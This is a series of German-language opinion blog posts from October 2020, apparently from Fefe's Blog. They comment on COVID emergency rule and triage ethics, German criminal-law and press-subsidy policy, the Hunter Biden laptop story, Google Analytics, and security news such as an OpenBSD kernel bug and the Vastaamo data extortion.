Und dann noch ein Gedanken zum Notstand: Da gibt es in China auch ein schon in konfuzianistischer Zeit etabliertes Protokoll: Du darfst als lokaler Regent jederzeit (begründet) den Notstand ausrufen, das ist dann mit erheblichen Sonderrechten für die Notstandsverwaltung gekoppelt (die üblicherweise militärisch organisiert ist, auch wenn die Notstände nicht immer Aufstände sind, sondern auch Naturkatastrophen beinhalten).
Aber: Wenn du den Notstand ausrufst, gibst du das Heft aus der Hand. Du hast den Notstand ausgerufen, du bist nicht mehr zuständig, dafür sind jetzt die Experten zuständig, die sich für diesen Notstand vorbereitet haben, und die das auch können — und die drücken anders als der Problemlöser bei Pulp Fiction nicht dir den Putzlappen in die Hand, sondern machen das selber, weil sie wissen, dass du auch so einfache Sachen nicht trainiert hast. Wenn die alles wieder geklärt haben, kannst du auch wieder eingesetzt werden, wenn du den Notstand rechtzeitig ausgerufen hast.
Das verhindert, dass der Notstand unnötig erklärt wird. Es verzögert evtl. das Ausrufen des Notstands (aber dann bist du wirklich weg). Es wird auf jeden Fall von dir erwartet, dass du nach Ausrufen des Notstands deinen Rücktritt anbietest; dieses Angebot wird dann verwehrt, wenn du keine großen Fehler gemacht hast. Der Bürgermeister von Wuhan hat sich ungefähr an das Protokoll gehalten.
Auf gar keinen Fall darfst du aber den Fehler machen, auf irgendwen anderen zu deuten, weshalb Zhou Xianwang genau danach seinen Rücktritt angeboten hat, als er behauptet hat, man bräuchte als Lokalregierung Autorisierung, um solche Informationen öffentlich zu machen. Das geht natürlich gar nicht. Verantwortung haben bedeutet auch, dass man schuld ist, Punkt.
Die Notstandsbekämpfung hat man dann in die Hände von Zhong Nanshan+Team und andere Experten gelegt, und Zhou Xianwang de facto erst mit dem Ende des Lockdowns wieder das Zepter der Stadt zurückgegeben.
Die Schwierigkeit an dem Konzept ist dann noch, dass die Notstands-Militärregierung auch von sich aus wieder die Zügel aus der Hand geben muss, wenn der Notstand beendet ist. Da hilft natürlich, ein Riesenreich zu haben, in dem es immer irgendwo einen Notstand gibt, weshalb die Truppen dann nicht arbeitslos werden, wenn sie an einer Stelle ein Problem gelöst haben.
(Danke, Bernd)
[l] Wenn ihr gerade mal 90 Sekunden Zeit habt, guckt euch den Gedankengang an, den Drosten hier kurz anspricht. Es geht da um die Bedeutung des Wortes Triage und um den ethischen Konsens in der Gesellschaft. Die Sendung ist lang und lohnt sich bestimmt komplett, aber diese 90 Sekunden bringen das prima auf den Punkt.
Im Wesentlichen sagt er, dass die Amerikaner einen anderen gesellschaftlichen Konsens haben, wie der Wert von menschlichem Leben zu bewerten sei, als wir Europäer. In Amerika hat man eine Metrik namens "Years of Potential Life Lost". Wenn auf der Intentivstation ein alter Mensch mit Covid am Beatmungsgerät hängt, mit einer Überlebenschance von 50%, und dann kommt ein 30-Jähriger mit schwerem Covid-Verlauf rein, und du hast kein anderes Beatmungsgerät, dann würde man in den USA ganz knallhart den Alten abhängen und sterben lassen, weil der weniger Restlebenserwartung vor sich hatte.
Das ist nach europäischem Ethik-Verständnis inakzeptabel, daher machen wir lieber im Vorfeld krassere Lockdown-Maßnahmen, damit es soweit nicht kommt.
Das kann auch gleichzeitig als Grund dafür herhalten, wieso wir nicht einmal die Bevölkerung durchseuchen, so ala "ach das bisschen Sterblichkeit, da sterben ja im Straßenverkehr mehr". Oder wieso unser Verfassungsgericht damals gesagt hat: Nein, Schäuble, du darfst keine Flugzeuge abschießen, auch nicht wenn du glaubst, die sind von Terroristen entführt und fliegen gerade auf den Bundestag zu.
Ich finde das eine gute rote Linie. Ökonomisierung von Ethik ist menschenverachtend.
Update: Denkt übrigens auch mal über die "aber da sterben doch nur alte Leute, die eh bald gestorben wären"-Argumentation nach, aber aus der Perspektive der Triage. Vielleicht sind vor allem alte Menschen gestorben, weil die Krankenhäuser Triage nach amerikanischem Modell gemacht haben. Weit entfernt von Scifi-Dystopien wie der Suicide Booth oder Soylent Green (der bei uns übrigens das Jahr 2022 im Titel trug in der Übersetzung) sind wir da nicht mehr.
Und wenn ihr noch eine Minute länger dran bleibt bei Drosten, dann zeigt er Grafik aus Argentinien, wo der Lockdown das exponentielle Wachstum nicht stoppen konnte, obwohl es ein deutlich härterer Lockdown als bei uns war. Warum nicht? Drosten meint: Argentinien ist auf der Südhalbkugel, da war Winter. Wenn wir jetzt hier Winter kriegen, wird das hier ähnlich übel.
Update: Auf Twitter erzählt jemand aus der Schweiz:
Die Triage-Richtlinien in der Schweiz sehen vor, dass Personen über 85 (+ Leute über 75 mit Vorerkrankung) keinen ITS-Platz bekommen. Egal ob die Prognose sehr gut oder schlecht ist. [...]
Wer denkt, dieses Szenario sei noch weit weg: Im Wallis wurde ein 80-jähriger wieder Heim geschickt.
Hier ist eine Meldung zu dem Walliser.
Update: Jetzt kommen hier wie zu erwarten Leute mit "aber was wenn wir auch Triage machen müssen?". Ich sehe das so. Aufgabe der Regierung ist nicht, einen stabilen Regierungsbunker zu bauen. Ein Land im nuklearen Winter braucht keine Regierung, schon gar keine, die aus einem Bunker regiert. Aufgabe der Regierung ist es den Atomkrieg zu verhindern. Dann kommt als nächste Frage: Na man hätte ja $MASSNAHME machen können im Sommer!1!! Das mag sein und ist sogar mit an Sicherheit grenzender Wahrscheinlichkeit wahr. Aber das ergibt als Gedankenspiel überhaupt keinen Sinn. Aufgabe der Politik ist es aktuell nicht, die Schuld für das bisherige Versagen zu suchen. Das können wir machen, nachdem die Kuh vom Eis ist. Aufgabe der Politik ist es, Schlimmeres zu verhindern. Wenn wir dann doch in eine unlösbare Scheißsituation reinrutschen, dann ist es halt so. Aber es wäre mir viel lieber, wenn wir da reinrutschen, nachdem wir alle Optionen vorher ausprobiert haben und sie nicht funktioniert haben, als weil wir vorher unsere Zeit mit sinnlosen Schuldzuweisungen verplempert haben.
Wir haben jetzt eine Krise, und die wird wahrscheinlich noch viel schlimmer werden. Das ist eine mathematische Sicherheit, soweit man auf der Datenbasis Vorhersagen machen kann. Es gibt kein Szenario gerade, bei dem alles spontan gut wird, so ala "und dann teilten sich die Wolken und die Hand Gottes kam herunter und heilte uns alle". Also hört bitte mit den beiden sinnlosen Selbstsabotagevarianten auf: Nachdenken über "was wenn wir alle sterben müssen" und nachdenken über wer im Sommer was hätte besser machen können. Denkt lieber darüber nach, was wir alle und insbesondere ihr selber jetzt besser machen könnt. (Danke, Barbara)

Sat Oct 31 2020

[l] Hier mal eine kleine pädagogische Hausaufgabe für die geneigten Leser.
Idee vom Erdgeist:
Wie krass Orwells „Memory Hole“ inzwischen funktioniert, könnt ihr mal empirisch ergründen: Könnt ihr er-googlen oder er-bingen, was Jörg Schönbohm mit Schafen nicht gemacht hatte?

Fri Oct 30 2020

[l] Endlich! Justizreform verschärft die Strafen. Das hatten wir ja auch lange nicht mehr. Diesmal der Dauerbrenner "sexualisierte Gewalt gegen Kinder".
Ich stell mir das so vor:
Da sitzt ein Typ auf einem Sofa, neben ihm ein niedliches kleines Kind.
Der Typ guckt sich kurz das Strafmaß im Gesetz an und macht eine Abwägung.
Scheiße, Bernd! Nur drei Jahre Knast? Das ist ja so gut wie gar nichts! Da werd ich doch mal eben übergriffig!!1!
Wenn ich höre, dass sie bei irgendwas die Strafen verschärfen wollen, sehe ich immer verängstigte, inkompetente Flachzangen vor mir, die verzweifelt irgendwas tun, damit man nicht so merkt, wie verängstigt und inkompetent sie sind. Egal was. Hauptsache wir haben was getan.
Wir verschärfen jetzt seit Jahren ständig an irgendwelchen Strafmaßen herum. Hat da mal jemand wissenschaftlich untersucht, ob die Verschärfung was gebracht hat? Natürlich nicht! Die WISSEN doch, dass das sinnloser Aktionismus ist!
Erinnert ihr euch an einen einzigen Fall, wo eine Strafverschäfung zurückgenommen wurde? Ich nicht.
Nicht weil die nicht sinnlos gewesen wären, sondern weil wir lieber nicht geguckt haben, wie sinnlos sie waren.
Ich finde man kann das prima an der Drogenpolitik sehen, wie der Mechanismus funktioniert. Irgendein Schwachmat in der Politik möchte sich gerne als "tough on crime" positionieren und hangelt sich mit martialischer Rhetorik so nah an die Todesstrafe ran wie er kann. Und dann, ein Jahr später, kommt der nächste Sprallo und erhöht die Strafen noch weiter.
Bei Kindesmissbrauch sind wir jetzt schon bei der vierten Ableitung angekommen. Der Missbrauch selbst war ja schon immer strafbar. Dann hieß es: Pornos davon herstellen ist verboten. Dann hieß es: Pornos davon besitzen ist verboten. Dann kam: Scheiß auf die Kinder, wir knasten jetzt Jugendliche ein, die sich gegenseitig Nackt-Selfies schicken ("Jugendpornografie")! Und aktueller Stand ist noch eine Indirektion mehr: "Anscheinspornografie". Wenn der Richter findet, der Darsteller sieht aber jung aus, dann reicht das schon. Oh und: Es gibt gar keinen Darsteller (und damit kein Missbrauchsopfer!), weil das alles gemalt oder Computergrafik ist? Egal! ALLE EINSPERREN!!1!
Das sind einfach alles lauter verängstigte alte Menschen, die die Welt um sich herum nicht mehr verstehen. In ihrer Verzweiflung wollen sie alles verstecken, das sie nicht verstehen. Genau wie so Kindergartenkinder. Wisst ihr? Die sich die Augen zuhalten und dann glauben, sie seien für die anderen auch unsichtbar?
Willkommen im deutschen Strafrecht.
Ach komm, Fefe, da packen wir noch eine Strafverschärfung drauf!1!!
Ich persönlich finde bemerkenswert, dass je mehr wir da verschärfen, von desto mehr großen Kinderpornoring-Aushebungen hört man in der Tagesschau. Kann es sein, dass wir das Problem mit der Verschärfung nicht nur nicht lösen sondern sogar schlimmer machen?
Wenn man die Strafen hochsetzt, dann erhöht sich damit das Risiko für die Kriminellen, und damit auch der Profit, den die machen können. Das garantiert doch geradezu, dass es immer Nachschub geben wird! Oder hab ich da einen Denkfehler?
[l] Deutschland steigt in die direkte Presseförderung ein, verteilt 220 Millionen Euro unter den Bedürftigen.
Wie? Nein, nicht die Journalisten. Haha. Seit wann werden bei uns die tatsächlich Bedürftigen mit Geld beworfen! Nein, die Verlage natürlich! Denen man schon das "Leistungs""schutz""recht" in den Arsch geblasen hatte.
So und was soll offiziell mit dem Geld gemacht werden? Die können ja schlecht ranschreiben, dass das für Koks und Nutten für die Verlagsbonzen ist.
beispielsweise für Investitionen in den Aufbau von Online-Shops, Rubrikenportalen und Apps sowie den Aufbau eigener oder verlagsübergreifender Plattformen zum Vertrieb der Inhalte.
Oh ja super. Online-Shops, Rubrikenportale und Apps haben ja in den letzten Jahren echt enorm Kohle in die Kassen gespühlt. Man könnte fast von Erfolgsmodellen reden!1!!
Ich hätte ja an Stelle der Politik gesagt, das ist für den Aufbau von Paywalls. Dann hätten die Verlage sich weiter selbst in die Bedeutungslosigkeit wegzensiert und die Bevölkerung würde sich am besten nur noch bei Propagandaoutlets wie der Deutschen Welle (Motto: "Russia Today mit mehr Propaganda als die haben zurückdrängen") "informieren". Win-Win! Und die Verlage glauben noch, du hättest ihnen geholfen! HAHA, Suckers!

Wed Oct 28 2020

[l] Bug des Tages: OpenBSD hat ein use-after-free im ICMPv6-Handling. Aus dem Patch ist jetzt nicht ersichtlich, wie der Speicher benutzt wurde. Wenn das nur lesend war, dann kann so ein Bug jahrelang unerkannt bleiben und führt wenn dann zu einer Kernel Panic, weil der Kernel auf eine Seite zugreift, die inzwischen nicht mehr gemappt ist.
Wenn das schreibend war, dann muss man das als remote exploitbar werten.
Anyway, man kann OpenBSD eine Menge vorwerfen, aber immerhin fangen sie bei sowas nicht zu verhandeln an sondern schließen alle solchen Bugs zeitnah.
Es zeigt aber, was ich schon seit längerem anmerke: Mitigations sind bestenfalls ein Werkzeug zum Verkleinern des Problems, keine Lösung für das Problem.
Update: Der Bug-Finder meint, das sei Remote Code Execution. (Danke, Volker)
[l] Wisst ihr noch, wie wir vor Overblocking gewarnt haben? Dass wenn man Facebook und Youtube und co mit Strafe bei zu wenig Zensur droht, dass die dann halt lieber zuviel zensieren würden?
Nun, da gab es einen schönen Fall. Wer diese tolle Meldung des Postillon auf Facbeook teilte, dessen Account wurde gesperrt. Dagegen hat jemand geklagt und das Gericht urteilte wie folgt:
Die Frankenthaler Richter haben nun aber geurteilt: Was Facebook mit ihm gemacht hat, geht in Ordnung. Denn das Profil des Mannes war nur für wenige Stunden blockiert. Und das Unternehmen dürfe Nutzer auch vorsichtshalber sperren, wenn es einen Beitrag zunächst nicht klar einordnen kann.
Das war das Landgericht, der Typ kann noch vors OLG ziehen. (Danke, Gereon)

Tue Oct 27 2020

[l] Youtube-dl ist wieder auf Github online!
Nicht ganz freiwillig auf Seiten von Github. Die haben da seit Ewigkeiten einen Bug, dass beliebige Leute in existierende Repositories Daten hochladen können. Das ändert am Checkout erstmal nichts, denn der ist per Crypto-Hash an einen bestimmten Stand gekoppelt. Den aktuellen Hash kann man so auch nicht ändern, man kann nur zusätzliche Daten in ein Repo laden. Die sind dann allerdings über einen direkten Link auf den Hash abrufbar.
Das hat jetzt halt jemand mit dem GMCA-Repo gemacht, in dem Github die DMCA-Meldungen ablegt.
Ich sitze da jetzt seit ein paar Tagen drauf, weil ich mir dachte, wenn ich drauf linke, dann machen die das sofort weg. Aber offensichtlich sind die gar nicht in der Lage, das wegzumachen. Dann kann ich auch drauf linken.
Die Homepage von youtube-dl hat auch relativ schnell ihre Links zur aktuellen Version gefixt.
Ich bin mir sicher, dass die RIAA da einfach weiter Drohbriefe verschicken wird.
[l] Hacker hacken ... Vastaamo, einen finnischen Psychotherapie-Dienstleister. Und was finden sie da? Offenbar Transkripte der Gespräche mit den Psychiatern.
Der nächste Schritt wird niemanden überraschen: "Zahlen sie 200 € in Bitcoin oder wir veröffentlichen das Transkript" an alle Patienten.
Wenn es nach mir ginge, würde diese Firma jetzt dem Erdboden gleichgemacht. Diese Daten mussten nicht am Internet hängen, und schon gar nicht unverschlüsselt. Da wo jetzt das Hauptquartier dieses Dienstleisters steht, sollte in Zukunft ein schönes Naherholungsgebiet entstehen.

Mon Oct 26 2020

[l] Zu den invasiven Schalentieren: Die gibt es nicht nur in Belgien. Ein aufmerksamer Leser schickte mir folgenden Leserbrief:
Zu den Mutanten-Schalentieren sei noch anzumerken, dass es auch in Berlin Populationen davon gibt, und zwar in der Krummen Lanke und im Schlachtensee.
[igb-berlin.de]
Und das ist übrigens nicht die einzige invasive Krebs-Art in Berlin: seit einigen Jahren hat es sich der rote amerikanische Sumpfkrebs im Tiergarten heimisch gemacht. Die müssen seitdem jährlich befischt werden, dieser Artikel spricht von 39000 Krebsen:
[Tagesspiegel]
Hatte ich beides überhaupt nicht mitgekriegt, und ich wohne in Berlin! (Danke, Andreas)

Sat Oct 24 2020

[l] Nochmal zu Hunter Biden: Nur weil die Laptop-Story unglaubwürdig ist, heißt das ja nicht, dass Hunter Biden nicht tatsächlich völlig inkompetent und kriminell ist.
Wer sich über die ganzen Details der Geschichte informieren will, kann das bei Matt Taibbi und Katie Halper tun (das erste Drittel der Sendung, ca. 20 Minuten).
Ich fasse mal fies kürzend zusammen: Die Ukraine ist nach dem Zusammenbruch der Sowjetunion genau wie Russland in den Händen krimineller Banden. Eine davon ist Burisma, ein Stromkonzern. Die Staatsanwaltschaft, ebenfalls in den Händen der organisierten Kriminalität, fährt eine Schutzgeldnummer mit den anderen Kriminellen.
Die Mafia ist aber nicht doof und Burisma stellt vorsorglich für ihren "Aufsichtsrat" einen Haufen von Verwandtschaft von westlichen Staatsmännern ein, Hunter Biden ist einer davon, aber sie haben auch jemanden für die polnische Regierung und einen für das US-Außenministerium unter Vertrag. Die "Berater" kriegen für im Wesentlichen keine Arbeit großzügige Geldberge zugeschoben.
Der Fairness halber sollte ich dazu sagen, dass das auch im Westen üblich ist. Die Aufsichtsräte der Großkonzerne in Deutschland sind auch vollgestopft mit Politikern, die dann einen Anreiz haben, zu hinderliche Regulierung zu verhindern.
Hunter Biden soll dann wohl auf seinen Vater eingewirkt haben, damit der diesen Staatsanwalt wegräumt, der von Burisma Schutzgeld haben wollte.
Das klingt jetzt alles nicht weiter unglaubwürdig für mich. Genau so würde man das machen, wenn man Mafiaboss in der Ukraine ist.
Aber diese Laptop-Nummer ist Bullshit, sorry. Das ist Parallel Construction. Irgendwelche Abhörapparate irgendeines Geheimdienstes werden E-Mails abgefangen haben, und jetzt erzählen sie uns einen vom Pferd mit dem Laptop.
Übrigens ist der Sitz von Hunter Biden in einem Aufsichtsrat in der Ukraine AFAIK weder ungewöhnlich noch anstößig noch illegal. Auch nicht dass er dann auf seinen Vater einwirkt. Wenn der Vater sich von seinem Sohn beeinflussen lässt, wird das langsam unmoralisch, aber wenn alles was der Vater dann tut die Absetzung eines korrupten Staatsanwaltes ist, dann sehe ich da wenig Anlass zu großen Anti-Korruptions-Reden.
Außer wir sehen es jetzt plötzlich negativ, wenn die USA die Souveränität anderer Staaten verletzten. Hab ich da das Memo nicht gekriegt? Wenn das so ist, dann können wir ja mal über Ramstein reden (wo übrigens jetzt ein "Weltraumzentrum" der Nato eingerichtet werden soll).
Update: In dem Video machen sie einen interessanten Punkt für die Wahl. Normalerweise sind es die Democrats, die am Wahltag persönlich hingehen, und die Republikaner haben per Briefwahl gewählt. Am Wahltag sehen die Hochrechnungen dann anfangs positiv für die Republikaner aus und im Laufe der Nacht holen die Democrats auf. Dieses Mal ist das wegen Corona anders. Trump hat Briefwahl schlechtgemacht, und Corona macht den Democrats Angst vor persönlich hingehen. Daher wird das dieses Mal vermutlich andersherum sein. Am Anfang sieht es so aus als lägen die Democrats klar in Führung, weil die alle jetzt schon per Briefwahl gewählt haben. Aber die Republikaner gehen am Wahltag persönlich hin und im Laufe der Nacht holen die dann dauf. Außerdem wird es diesmal mehrere Tage brauchen, bevor es ein halbwegs seriöses Zwischenergebnis gibt. Aus Deutschland heraus ist es also nicht sonderlich hilfreich, sich die Nacht um die Ohren zu hauen.

Fri Oct 23 2020

[l] Schönes Interview mit einem Medizinstatistiker über das Covid-Security-Theater.
Viel von dem Covid-Streit über Maßnahmen gerade ist ja gerade wie wenn sich zwei Blinde über Farben streiten. Beide Seiten haben die Daten für eine fundierte Entscheidung nicht. Es geht daher um Risikoabschätzung und den Umgang mit Unbekannten.
Das ist auch der Grund, wieso ich mich überhaupt zu der Sache äußere. Ich bin ja kein Arzt. Aber Risiken abschätzen mache ich beruflich.
Und wie bei Software entwickelt sich bei Covid gerade ein Security-Theater (das ist der Fachbegriff für Maßnahmen, die nichts bewirken). Die machen Entscheider in Firmen bei Software-Fragen und Politiker bei Pandemie-Fragen trotzdem, weil sie gerne dabei gesehen werden wollen, wie sie handeln, um das Problem zu beseitigen. Dabei spielt es keine Rolle, ob das Theater ist oder ob es wirkt.
Aber während die Software-Leute erkannt haben, dass man für Entscheidungen Daten braucht, und die dann halt erheben, hat die Politik seit April lieber Verstecken gespielt und Security-Theater gemacht.
Die Analyse von dem, was da gerade passiert, führt immer wieder auf das Gleiche zurück: Wir haben keinen Plan A, B oder C. Man hat es laufen lassen und gehofft, dass es sich irgendwie zurechtwurschteln wird. Und jetzt stellt man fest: Die Kapazität reicht nicht. Warum hat man nicht vor ein paar Monaten angefangen, beispielsweise Soldaten von der Bundeswehr zu schulen, damit sie genau dort eingreifen können und Hilfe leisten können, wo jetzt die Engpässe auftreten.
Wie immer in der Politik. Do nothing then claim credit.
[l] Dachtet ihr, Bill Gates sei der dämlichste Kriminelle? Weit gefehlt! Es gibt gerade eine Verschwörungstheorie mit einem noch inkompetenteren Kriminellen: Hunter Biden.
Hunter Biden ist der Sohn von Joe Biden.
So, passt auf. Hunter Biden ist in lauter Straftaten verwickelt, und hat die Beweise gegen sich auf einem Laptop gespeichert.
Unverschlüsselt, versteht sich.
Neben einem Haufen Kinderpornos.
Der Laptop geht kaputt.
Biden bringt ihn zum Reparaturservice. Und zwar nicht zu irgendeinem, nein nein! Zu einem, der von einem Trump-Anhänger betrieben wird.
Apple, wir erinnern uns, hat einen offen schwulen CEO. Apple spendet den Democrats eine Größenordnung mehr als den Republicans. Apple unterstützt Black Lives Matter. Was glaubt ihr, wie lange man suchen muss, um einen Apple-Reparaturservice zu finden, der Trump-Anhänger ist?
Apple liefert übrigens seit 2003 Plattenverschlüsselung als Teil des Systems aus. Aber Hunter Biden hat das nicht angeschaltet.
Dieser Reparaturservice sitzt jetzt auf dem Laptop, denn Biden vergisst ihn abzuholen. Den Laptop mit dem Polonium-Kompromat. Vergisst er abzuholen.
Daraufhin macht dieser Reparaturservice, was jeder Reparaturservice an seiner Stelle getan hätte, und zieht sich mal ein Image der Platte und stochert illegal darin herum, findet das Kompromat und die Kinderpornographie und dann geht der Chef des Ladens damit zu seinem alten Kumpel Rudi Giuliani, dem Anwalt von Donald Trump.
Der Reparaturservice ist übrigens in Delaware, beim Wohnsitz der Bidens. Das war daher auch keine Impulshandlung und kein "ich bin auf reisen"-Notfall, dass Biden bei diesem Reparaturservice landet.
Ich dachte erst: Niemand kann so blöde sein, diese Nummer zu glauben. Die ist fraktal unglaubwürdig. Jeder Aspekt davon für sich ist so unglaubwürdig, dass er alleine reichen sollte, nichts davon zu glauben.
Dann dachte ich mir: Doch.
Einer ist so blöde.
Donald Trump.
Also wird der das Ziel gewesen sein.
Daher ist meine Theorie gerade, dass der Biden einen schönen Fake-Laptop mit Fake-Daten gebastelt hat, und dann hat er eine Weile recherchiert, welchem Reparaturservice man das mal geben könnte, damit der Trump sich damit im Wahlkampf so richtig zum Deppen macht.
Das erscheint mir jedenfalls deutlich wahrscheinlicher gerade als dass Joe Biden (Berufspolitiker mit über 40 Jahren Erfahrung, der weiß was Kompromat ist und dass man an seine Datenspuren Hygieneregeln anlegt) und vor allem sein Personal (die beobachtet haben, wie Hillary Clinton über geleakte E-Mails stolperte!) auch nur einen Teilaspekt davon so geschehen lassen würden.
Ich bin kein Fan von Biden, wohlgemerkt. Der ist genau wie Trump viel zu alt und hat Anzeichen von Demenz gezeigt. Keiner von denen sollte Präsident werden können. Aber diese Nummer würdet ihr umgekehrt auch nicht glauben, wenn sie angeblich Jared Kushner passiert wäre.
Darf ich an das Wassersport-in-russischen-Hotels-Dossier über Trump erinnern? Das fandet ihr alle total unglaubwürdig, aber den Scheiß hier nicht?!?
Früher war die Basis von Verschwörungstheorien, dass der Gegner super schlau und übermächtig ist. Heute ist die Basis von Verschwörungstheorien, dass der Gegner der dümmste anzunehmende Vollidiot ist und sich wie frisch lobotomiert verhält. Ich mochte die alten Verschwörungstheorien lieber.
Update: Die Reaktion der Democrats deckt sich übrigens mit meiner Theorie. Die haben nicht etwa "ist alles Lüge" gerufen oder Beweise verlangt, sondern die haben gemacht, was auch ein geschulter Geheimdienst-Agitator getan hätte: Behauptet, die Quelle sei ein russischer Agent. Das beendet die Sache nicht, es befeuert sie noch. Kann natürlich immer noch sein, dass die einfach alle unfassbar dämlich sind. Fast (aber nicht ganz) so schlimm wie Trump und sein Clan von Pleitiers und Blendern.
Update: Übrigens, am Rande. Selbst wenn Hunter Biden schlimme Dinge getan hätte, was hat das mit Joe Biden zu tun? Nun, Joe hat vor einer Weile öffentlich den Rücktritt eines Staatsanwaltes in der Ukraine gefordert. Der war angeblich für die angeblichen Vergehen seines Sohnes Hunter zuständig. Das ist aber eine Lüge, wie z.B. ABC News ausführt:
In that time, he did not prosecute a single person for corruption, despite corruption being a widespread problem, particularly in the energy industry.
Mr Shokin instead allegedly spent his time in office shaking people down for bribes. [...]
The US State Department, the European Union and the International Monetary Fund all urged Ukraine to fire Mr Shokin
Von "Joe Biden macht Druck im Ausland, um seinen Sohn aus der Schusslinie von Ermittlungen zu holen" kann überhaupt keine Rede sein. Aber das wusstet ihr ja vermutlich schon. Denn wieso sollte ausgerechnet DER Aspekt dieser Saga wahr sein, wenn der Rest offensichtlich Bullshit ist. Trump macht keine halben Sachen. Da ist immer alles komplett gelogen.
Update: Die New York Times hat übrigens mal jemanden zu dem Repair-Shop geschickt. Ergebnis:
Mr. Isaac said in an interview with The New York Times last week outside the shop that he is legally blind and could not be sure whether the man was Hunter Biden but asked his name to fill out a work order, and the man identified himself as Hunter Biden.
Whoa, Alter, wenn DAS kein Slam Dunk Case ist, dann weiß ich auch nicht!1!!

Thu Oct 22 2020

[l] Wo wir gerade bei der Staatsanwaltschaft waren: Die sollte sich ja eigentlich an Recht und Gesetz halten, nicht wahr? Würde man denken?
Die Staatsanwaltschaft von Oldenburg hat da höhere Ambitionen.
In dem Verfahren vor dem Landgericht hatte der Staatsanwalt unter anderem aus der Bibel die Worte "Wer sein Kind liebt, der züchtige es" zitiert. Außerdem sagte er, es sei noch gar nicht so lange her, dass das Schlagen der eigenen Kinder erlaubt gewesen sei. In anderen Ländern sei das Züchtigen noch heute an der Tagesordnung. Auch laut Papst Franziskus sei es in Ordnung, wenn man seine Kinder "würdevoll" schlage, so der Staatsanwalt.
Und wenn man das macht, dann kommen Kinder raus, die es später für normal halten, wenn Eltern ihre Kinder schlagen. Weil man das ja früher auch so gemacht hat. (Danke, Malte)

Thu Oct 15 2020

[l] Die ARD verzockt weiter Glaubwürdigkeit mit unseriösen Taschenspielertricks wie manipulierten Achsen an Graphen, die man eher RT zugetraut hätte. Lustigerweise hat der ARD "Faktenfinder" (haha!) auch schon mal eine Folge dazu gemacht, wie man manipulierte Graphen erkennt. m(
[l] Ich habe ja noch nie die Obsession mit Telemetrie im Web verstanden. Das kostet Aufwand und am Ende kommt keine gute Webseite raus (eine, die weniger Bullshit lädt), sondern eine nach irgendwelchen ad-hoc aus dem Arsch gezogenen Kriterien "optimierte", die immer noch bei allen Besuchern elend Ressourcen verschwendet.
Ich glaube auch, dass diese ganzen Logauswertungen gar nichts auswerten sondern halt gemacht werden, weil die coolen Kids das auch machen. Wenn GOOGLE Analytics macht, dann brauchen wir das auch!1!!
Und so packen die Leute alle wie die Bekloppten Google Analytics auf ihre Webeiten, sind damit nicht DSGVO-konform, und haben als einzige Einsicht am Ende, dass sie hauptsächlich aus Deutschland aufgerufen werden. No shit, Sherlock!
Ich spreche das an, weil heute folgende Meldung zu Google Analytics rumgeht: "Google Analytics 4 soll dank KI Datenschutz-freundlicher einsetzbar sein". Das klingt ja schon direkt wie gequirlter Bullshit mit Sahne. Datenschutzfreundliche Analytics loggen weniger Daten. Aus weniger Daten kann man weniger ablesen. Was sie uns hier sagen wollen ist: Die KI zieht sich dann die fehlenden Daten aus dem Arsch. Nein, wirklich!
Mittels Machine Learning will Google Löcher in den Analytics-Daten stopfen, die durch fehlende Cookies von Drittanbietern entstehen.
Wie geil ist DAS denn! Das ist schwarz auf weiß die Ansage, dass die Analytics-Daten, die Google ihren Kunden gibt, eh wertlos sind und/oder dass Google überzeugt ist, dass die Kunden das nicht betreiben, um Einsichten zu gewinnen, sondern um bunte Bilder für ihre sinnlosen Management-Rituale zu haben.
Und da passt dann mal wieder alles zusammen. Die einzigen, die weiterhin gute Daten aus Google Analytics kriegen, sind Google selbst. Die anderen kriegen sinnlose bunte Bilder, abstrakte Kunst generiert von KI. Da ergibt dann auch Googles Forschung in träumende KI-Kunst rückblickend plötzlich Sinn! Das war Vorbereitung darauf, sich geträumte Barcharts per KI aus dem Arsch zu ziehen.
Füllt mich ein bisschen mit Genugtuung, denn es heißt mehrere Dinge.
Erstens: Die Datenschutzmaßnahmen wirken. Das schmerzt die Analytics-Täter (und ich meine jetzt nicht die bei Google sondern die, die Google Analytics o.ä. auf ihren Webseiten fahren). Finde ich gut. Mehr davon!
Zweitens: Google hat verstanden, dass die Leute, die ihre Spionagesoftware bei sich einblenden, zu blöde sind, um echte und gefakete Analytics unterscheiden zu können, und verarscht sie jetzt nach Strich und Faden mit KI-generiertem Bullshit. Das wäre nur dann noch schöner, wenn die dafür noch eine Rechnung gestellt bekämen. Leider würde dann Google das Geschäftsmodell wegbrechen, Kohle mit ihnen von Analytics-Tätern gehehlten Daten unschuldiger Dritter zu machen.
Um das eventuell etwas klarer zu formulieren: Analytics ist die Auswertung von Messwerten. Daten, die eine KI generiert, sind keine Messungen sondern Interpolation oder Extrapolation.
Update: Leserbrief dazu:
in den Projekten, in denen ich zu tun habe, ist es inzwischen oft so, dass auch die Auswertung der Telemetrie ausgelagert ist. Die eigentlichen Betreiber der Seite sind oder sehen sich nicht in der Lage mal in der Lage, sinnvolle Fragen zu formulieren, die man mit den Daten beantworten könnte. Deshalb wenden sie sich an Experten, die "damit Erfahrung haben". Die "erklären" dann, welche Kampagne besser funktioniert oder welche Zielgruppen es zu unterscheiden lohnt. Uns, die wir wissen, welcher Art die erhobenen Daten tatsächlich sind, kommt das vor wie Kaffeesatzleserei oder der Gang zum örtlichen Schamanen. Und man muss sich auch überlegen, wie in so einem Spiel die Interessen liegen. Natürlich wähle ich mir nicht den Experten, der mich schlecht aussehen lässt. Und der verwendet auch keine Werkzeuge, die ihn dazu bringen würden, mich schlecht aussehen zu lassen. Da kommen lauter tolle, positive Grafiken raus, die von Erfolg oder höchstens erschließbarem Potential erzählen und die man dann Entscheidern vorlegen kann, um mehr Geld für Kampagnen und deren Auswertung zu bekommen.

Sun Oct 11 2020

[l] Ihr kennt ja wahrscheinlich meine Position zu Ransomware-"Angriffen" (sonst siehe hier).
Aktuell ist die Software AG von Ransomware runtergefahren. Und natürlich versuchen die das genau so zu framen wie alle anderen von fieser KI-Malware "Angegriffenen":
Am 3. Oktober sei es zu dem Angriff mit Schadsoftware gekommen, teilte das Unternehmen mit.
Aha. Soso. Immerhin ist ihnen klar, dass das ihre Schuld ist, sonst würden sie das nicht im Passiv formulieren sondern im Aktiv. "Verbrecher haben uns angegriffen" oder so. Ja so ist das halt, wenn man die Infrastruktur soweit runterkommen lässt, dass sich an der Wand Schimmel bilden kann. Dann hat man irgendwann Schimmel an der Wand. Ein fieser Schimmelangriff hat bei der Software-AG die ansonsten tadellos gepflegte Wand attackiert!1!!
